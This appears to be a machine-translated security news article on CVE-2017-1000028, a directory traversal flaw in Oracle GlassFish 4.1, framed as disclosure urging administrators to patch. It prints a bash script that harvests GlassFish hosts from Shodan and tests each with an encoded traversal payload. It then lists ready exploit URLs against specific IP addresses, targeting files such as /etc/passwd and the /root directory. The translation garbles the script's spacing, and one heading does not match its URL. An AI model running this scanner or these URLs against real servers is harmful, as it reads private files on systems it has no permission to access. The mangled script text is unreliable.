HomesecurityGlassFish Oracle: Vulnerability Exposes Data to Thousands of Servers Worldwide (Analysis)

GlassFish Oracle: Vulnerability Exposes Data to Thousands of Servers Worldwide (Analysis)

GlassFish Oracle Vulnerability: Security researcher Dimitris Roussis analyzes us as a vulnerability to the known Application Server Its GlassFish Oracle recognized as CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) currently exposes data to thousands of servers worldwide.

Oracle GlassFish

Its exploitation security vacuum allows to read through the Directory Traversal Attack type of all server files on which the Application Server is installed.

In the analysis carried out by the researcher, 300 servers are first used as a sample through the shodan search engine that has GlashFish installed on the 4.1 version.

Then, through an automated script created by the researcher, they check which of the servers actually exists. vulnerability.

#! / bin / bash # Get 300 Results From Shodan search engine shodan search --limit 300 --fields ip_str GlassFish 4.1 port: 4848> servers_ip.txt # Sort IP cat servers_ip.txt | sort -n -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt # Remove All Whitespace sed -r 's / \ s + // g' servers_sort.txt> servers.txt # Delete Temporary Files rm servers_ip.txt rm servers_sort.txt # Server List input = "servers.txt" # check Server for the vulnerability while IFS = read -r line do ip = $ line # http: // server_ip / theme / META-INF / ../../../../../../../../../../ url = "http: // $ line: 4848 / theme / META-INF /% c0 % ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae % c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0 % ae% c0% af% c0% ae% c0% ae% c0% af "echo -n" ip: $ line "fetch =` curl -s -o / dev / null --max-time 5 -w "% {http_code} "$ url`; if [$ fetch = 200] then echo "- Connection Successful! Server is vulnerable" #Save result in vulnerable_servers.txt echo "$ url" >> vulnerable_servers.txt else echo "- Connection Failed! Server is Not vulnerable" fi done < "$ input"

Servers

The end result of the script is to create a file that contains links (urls) to exploit the vulnerability immediately.

Looking at the links included in the file browser we can see all the files in the / root of the Server.

Examples include:

Windows Server & Hosting

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Oracle GlassFish

Linux Server

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

GlassFish Oracle Servers

We can now access any file we want on the Server by adding the file path to the end of the url.

B.C.

/ Etc/ passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

 

/ Root

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

 

The above study demonstrates on the one hand that a vulnerability can lead to the disclosure of data on a large scale worldwide and on the other hand the need for immediate implementation of software updates by the System Administrators.

The SecNews editorial team sincerely thanks researcher Dimitrios Roussis for valid and timely information.

 

 

 

 

* Dimitris Roussis is a member of the Information Systems Security Laboratory of the University of the Aegean.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

spot_img

LIVE NEWS